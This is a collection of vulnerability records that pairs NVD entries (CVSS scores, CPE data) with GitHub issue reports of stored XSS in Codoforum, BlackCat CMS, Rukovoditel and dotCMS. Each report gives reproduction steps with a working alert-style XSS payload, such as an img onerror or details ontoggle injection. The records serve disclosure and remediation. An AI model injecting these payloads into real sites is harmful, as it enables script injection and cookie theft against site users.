**Describe the bug** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Pages" feature. **To Reproduce** Steps to reproduce the behavior: 1. Login into the Admin panel 2. Go to 'codoforum/admin/index.php?page=pages/pages' 3. Click Add Page 4. Insert Payload in 'Page Title': '><details/open/ontoggle=confirm(document.domain)> 5. Click Save 6. Go to Page 'codoforum/admin/index.php?page=pages/pages' 7. XSS Alert Message **Expected behavior** The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page **Screenshots** 1. Add Pages ![2](https://user-images.githubusercontent.com/62001260/93160620-e3c93680-f73a-11ea-9275-66c26d045cb0.PNG) 2. Xss Message ![3](https://user-images.githubusercontent.com/62001260/93160627-e88dea80-f73a-11ea-8b06-f0aad02286b3.PNG) **Desktop (please complete the following information):** OS: Windows Browser: All Version
Cross Site Script Vulnerability on "Pages" in Codoforum feature V.5.0.2
https://api.github.com/repos/r0ck3t1973/xss_payload/issues/3/comments
1
2020-09-15T03:10:06Z
2021-07-10T12:14:27Z
https://github.com/r0ck3t1973/xss_payload/issues/3
701,570,289
3
2,157
CVE-2020-25877
2021-07-09T22:15:08.073
A stored cross site scripting (XSS) vulnerability in the 'Add Page' feature of BlackCat CMS 1.3.6 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Title' parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://blackcat-cms.org/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/BlackCatDevelopment/BlackCatCMS/issues/401" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://blackcat-cms.org/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/BlackCatDevelopment/BlackCatCMS/issues/401" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:blackcat-cms:blackcat_cms:1.3.6:*:*:*:*:*:*:*", "matchCriteriaId": "43FE187C-677C-400B-ABED-9CFC115CCE9D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/BlackCatDevelopment/BlackCatCMS/issues/401
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "BlackCatDevelopment", "BlackCatCMS" ]
**Describe the bug** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Add Page" feature in Admin **To Reproduce** Steps to reproduce the behavior: 1. Login into the Admin panel 2. Go to 'BlackCatCMS/backend/start/index.php' 3. Click 'Add Page' 4. Insert Payload in 'Title': '><details/open/ontoggle=confirm(1337)> 5. Click 'Add Page' 6. XSS Alert Message **Expected behavior** The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page **Screenshots** 1. insert payload ![1](https://user-images.githubusercontent.com/62001260/93421687-3d1c9b80-f8dc-11ea-9e54-bed63b52f383.PNG) 2. xss alert message ![2](https://user-images.githubusercontent.com/62001260/93421704-460d6d00-f8dc-11ea-954a-06b164c6c54a.PNG) **Desktop (please complete the following information):** OS: Windows Browser: All Version
Cross Site Script Vulnerability on "Page" in BlackCAT CMS 1.3.6
https://api.github.com/repos/BlackCatDevelopment/BlackCatCMS/issues/401/comments
2
2020-09-17T04:53:17Z
2021-09-24T14:38:59Z
https://github.com/BlackCatDevelopment/BlackCatCMS/issues/401
703,263,406
401
2,158
CVE-2020-25878
2021-07-09T22:15:08.113
A stored cross site scripting (XSS) vulnerability in the 'Admin-Tools' feature of BlackCat CMS 1.3.6 allows authenticated attackers to execute arbitrary web scripts or HTML via crafted payloads entered into the 'Output Filters' and 'Droplets' modules.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://blackcat-cms.org/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/BlackCatDevelopment/BlackCatCMS/issues/402" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://blackcat-cms.org/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/BlackCatDevelopment/BlackCatCMS/issues/402" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:blackcat-cms:blackcat_cms:1.3.6:*:*:*:*:*:*:*", "matchCriteriaId": "43FE187C-677C-400B-ABED-9CFC115CCE9D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/BlackCatDevelopment/BlackCatCMS/issues/402
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "BlackCatDevelopment", "BlackCatCMS" ]
**Describe the bug** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Admin-Tools" feature in Admin **To Reproduce** Steps to reproduce the behavior: 1. Login into the Admin panel 2. Go to 'BlackCatCMS/backend/admintools/index.php' 3. Click Chose: +/ BlackCat CMS Output Filters: 'BlackCatCMS/backend/admintools/tool.php?tool=blackcatFilter' +/ Droplets: 'BlackCatCMS/backend/admintools/tool.php?tool=droplets' 4. Insert Payload '><details/open/ontoggle=confirm(1337)> ">< img src=xx onerror=alert(1) > 5. Save 6. XSS Alert Message **Expected behavior** The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page **Screenshots** 1. BlackCat CMS Output Filters: 'BlackCatCMS/backend/admintools/tool.php?tool=blackcatFilter' ![1](https://user-images.githubusercontent.com/62001260/93544913-562f5600-f989-11ea-9767-bfda4d227a7e.PNG) ![2](https://user-images.githubusercontent.com/62001260/93544915-57f91980-f989-11ea-89b8-2189c626bab9.PNG) ![3](https://user-images.githubusercontent.com/62001260/93544917-5891b000-f989-11ea-8ce9-a317d8685db9.PNG) 2. Droplets: 'BlackCatCMS/backend/admintools/tool.php?tool=droplets' ![4](https://user-images.githubusercontent.com/62001260/93544956-7828d880-f989-11ea-8d17-43c5b8519c87.PNG) ![5](https://user-images.githubusercontent.com/62001260/93544957-795a0580-f989-11ea-9f0b-76d38525a952.PNG) ![6](https://user-images.githubusercontent.com/62001260/93544960-79f29c00-f989-11ea-9d10-b06305dbdced.PNG) ![7](https://user-images.githubusercontent.com/62001260/93544962-79f29c00-f989-11ea-8f50-1458d815b6d6.PNG) ![8](https://user-images.githubusercontent.com/62001260/93544963-7a8b3280-f989-11ea-8b44-66ed7f419d27.PNG) ![9](https://user-images.githubusercontent.com/62001260/93544964-7b23c900-f989-11ea-8f1c-d3072d94e98b.PNG) **Desktop (please complete the following information):** OS: Windows Browser: All Version
Cross Site Script Vulnerability on "Admin-Tools" in BlackCAT CMS 1.3.6
https://api.github.com/repos/BlackCatDevelopment/BlackCatCMS/issues/402/comments
2
2020-09-18T01:32:54Z
2021-09-24T14:21:54Z
https://github.com/BlackCatDevelopment/BlackCatCMS/issues/402
704,013,709
402
2,159
CVE-2020-25879
2021-07-09T22:15:08.147
A stored cross site scripting (XSS) vulnerability in the 'Manage Users' feature of Codoforum v5.0.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Username' parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://codoforum.com/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/r0ck3t1973/xss_payload/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://codoforum.com/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/r0ck3t1973/xss_payload/issues/5" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:codologic:codoforum:5.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "2BCBD3E3-DEEA-488B-8246-F77BE6CB778D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/r0ck3t1973/xss_payload/issues/5
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "r0ck3t1973", "xss_payload" ]
**Describe the bug** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Manage Users" feature. **To Reproduce** Steps to reproduce the behavior: 1. Login into the Admin panel 2. Go to 'codoforum/admin/index.php?page=users/manage' 3. Click Edit Username Insert Payload ">< img src=xx onerror= alert(document.domain) > 4. Click Save 5. XSS Alert Message **Expected behavior** The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page **Screenshots** 1. Edit Username ![7](https://user-images.githubusercontent.com/62001260/93855290-76407b80-fce1-11ea-9620-deaab8ac4645.PNG) 2. Xss alert mess ![8](https://user-images.githubusercontent.com/62001260/93855325-835d6a80-fce1-11ea-972d-79022074122e.PNG) **Desktop (please complete the following information):** OS: Windows Browser: All Version
Cross Site Script Vulnerability on "Users" in Codoforum feature V.5.0.2
https://api.github.com/repos/r0ck3t1973/xss_payload/issues/5/comments
1
2020-09-22T07:40:45Z
2021-07-10T12:25:02Z
https://github.com/r0ck3t1973/xss_payload/issues/5
706,151,152
5
2,160
CVE-2020-35984
2021-07-09T22:15:08.180
A stored cross site scripting (XSS) vulnerability in the 'Users Alerts' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Title' parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/r0ck3t1973/rukovoditel/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/r0ck3t1973/rukovoditel/issues/4" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:*", "matchCriteriaId": "56C3B146-C89C-4E90-806F-A9A49F0FEC99", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/r0ck3t1973/rukovoditel/issues/4
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "r0ck3t1973", "rukovoditel" ]
/Describe the bug/ I download install rukoviditel 2.7.2 An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "users_alerts" feature. To Reproduce /Steps to reproduce the behavior/: 1, Login into the panel 2. Go to '/rukovoditel_2.7.2/index.php?module=users_alerts/' 3. Add new 'users_alerts' 4. Insert payload: "><img src=xx onerror=alert ('document.domain) > 5. Save and BOOM!!!! Alert XSS Message /Expected behavior/ The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. /Screenshots/ ![user](https://user-images.githubusercontent.com/62001260/102294632-520cd780-3f7c-11eb-977f-048e814a4902.PNG) ![user2](https://user-images.githubusercontent.com/62001260/102294633-533e0480-3f7c-11eb-9a3d-763caa43f5a4.PNG)
Store Cross Site Scripting Vulnerability on "users_alerts" in rukovoditel 2.7.2
https://api.github.com/repos/r0ck3t1973/rukovoditel/issues/4/comments
1
2020-12-16T01:54:42Z
2021-07-10T12:24:16Z
https://github.com/r0ck3t1973/rukovoditel/issues/4
768,376,001
4
2,161
CVE-2020-35985
2021-07-09T22:15:08.213
A stored cross site scripting (XSS) vulnerability in the 'Global Lists" feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/r0ck3t1973/rukovoditel/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/r0ck3t1973/rukovoditel/issues/3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:*", "matchCriteriaId": "56C3B146-C89C-4E90-806F-A9A49F0FEC99", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/r0ck3t1973/rukovoditel/issues/3
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "r0ck3t1973", "rukovoditel" ]
/Describe the bug/ I download install rukoviditel 2.7.2 An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "global_lists" feature. To Reproduce /Steps to reproduce the behavior/: 1, Login into the panel 2. Go to '/rukovoditel_2.7.2/index.php?module=global_lists/lists' 3. Add new 'global_lists' 4. Insert payload: "><img src=xx onerror=alert (document.cookie) > 5. Save and BOOM!!!! Alert XSS Message /Expected behavior/ The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. /Screenshots/ ![list](https://user-images.githubusercontent.com/62001260/102294422-d9a61680-3f7b-11eb-9e67-fecc3b5e51fe.PNG) ![list2](https://user-images.githubusercontent.com/62001260/102294425-da3ead00-3f7b-11eb-8539-ca5080301946.PNG)
Store Cross Site Scripting Vulnerability on "global_lists" in rukovoditel 2.7.2
https://api.github.com/repos/r0ck3t1973/rukovoditel/issues/3/comments
1
2020-12-16T01:51:19Z
2021-07-10T12:23:47Z
https://github.com/r0ck3t1973/rukovoditel/issues/3
768,374,504
3
2,162
CVE-2020-35986
2021-07-09T22:15:08.250
A stored cross site scripting (XSS) vulnerability in the 'Users Access Groups' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/r0ck3t1973/rukovoditel/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/r0ck3t1973/rukovoditel/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:*", "matchCriteriaId": "56C3B146-C89C-4E90-806F-A9A49F0FEC99", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/r0ck3t1973/rukovoditel/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "r0ck3t1973", "rukovoditel" ]
/Describe the bug/ I download install rukoviditel 2.7.2 An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "users_groups" feature. To Reproduce /Steps to reproduce the behavior/: 1, Login into the panel 2. Go to '/rukovoditel_2.7.2/index.php?module=users_groups/users_groups' 3. Add new 'users_groups' 4. Insert payload: "><img src=xx onerror=alert (document.domain) > 5. Save and BOOM!!!! Alert XSS Message /Expected behavior/ The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page /Screenshots/ ![group](https://user-images.githubusercontent.com/62001260/102294118-1e7d7d80-3f7b-11eb-9455-9f2449c033ca.PNG) ![group2](https://user-images.githubusercontent.com/62001260/102294127-250bf500-3f7b-11eb-95a3-8f588a1e5007.PNG)
Store Cross Site Scripting Vulnerability on "users_groups" in rukovoditel 2.7.2
https://api.github.com/repos/r0ck3t1973/rukovoditel/issues/2/comments
1
2020-12-16T01:46:27Z
2021-07-10T12:23:10Z
https://github.com/r0ck3t1973/rukovoditel/issues/2
768,372,479
2
2,163
CVE-2020-35987
2021-07-09T22:15:08.283
A stored cross site scripting (XSS) vulnerability in the 'Entities List' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/r0ck3t1973/rukovoditel/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/r0ck3t1973/rukovoditel/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:*", "matchCriteriaId": "56C3B146-C89C-4E90-806F-A9A49F0FEC99", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/r0ck3t1973/rukovoditel/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "r0ck3t1973", "rukovoditel" ]
/Describe the bug/ I download install rukoviditel 2.7.2 An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Entities" feature. To Reproduce /Steps to reproduce the behavior/: 1, Login into the panel 2. Go to '/rukovoditel_2.7.2/index.php?module=entities/entities' 3. Add new 'Entity' 4. Insert payload: "><img src=xx onerror=alert (1337) > 5. Save and BOOM!!!! Alert XSS Message /Expected behavior/ The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page /Screenshots/ 1. insert payload module 'entities' ![entities](https://user-images.githubusercontent.com/62001260/102293647-16710e00-3f7a-11eb-8729-3b2bd9b1716b.PNG) 2. BOOM!!! ![entities2](https://user-images.githubusercontent.com/62001260/102293735-428c8f00-3f7a-11eb-821e-5c6052b2e742.PNG) /Desktop (please complete the following information):/ OS: Windows Browser: All Version
Cross Site Script Vulnerability on "Entities" in rukovoditel 2.7.2
https://api.github.com/repos/r0ck3t1973/rukovoditel/issues/1/comments
1
2020-12-16T01:41:10Z
2021-07-10T12:22:48Z
https://github.com/r0ck3t1973/rukovoditel/issues/1
768,370,240
1
2,164
CVE-2021-35358
2021-07-09T22:15:08.397
A stored cross site scripting (XSS) vulnerability in dotAdmin/#/c/c_Images of dotCMS 21.05.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Title' and 'Filename' parameters.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/dotCMS/core/issues/20540" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/dotCMS/core/issues/20540" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dotcms:dotcms:21.05.1:*:*:*:*:*:*:*", "matchCriteriaId": "10FB1890-E260-4DA5-A2D4-C037D6A1CEAE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/dotCMS/core/issues/20540
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "dotCMS", "core" ]
**Describe the bug** Hi Team I found small a store xss in dotAdmin/#/c/c_Images install: Docker: dotcms/dotcms:21.05.1 **To Reproduce** 1. Login Admin panel 2. Go to 'dotAdmin/#/c/c_Images' 3. Click on 'Add new content' 4. Parameter: 'Title' and 'Filename" 5. Insert Payload Store XSS: "<im g src=x oner ror=alert(document.cookie)> foo / bar" 6. Click 'Choose File' and BOOM XSS 7. Save and refersh store XSS **impact** Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. **Screenshots** ![1](https://user-images.githubusercontent.com/62001260/121980845-e08cd500-cdb6-11eb-90a8-8e2b24a6146f.PNG) ![2](https://user-images.githubusercontent.com/62001260/121980848-e1be0200-cdb6-11eb-9199-6ad1194454d8.PNG) ![3](https://user-images.githubusercontent.com/62001260/121980851-e2569880-cdb6-11eb-870b-6316980f11fb.PNG) 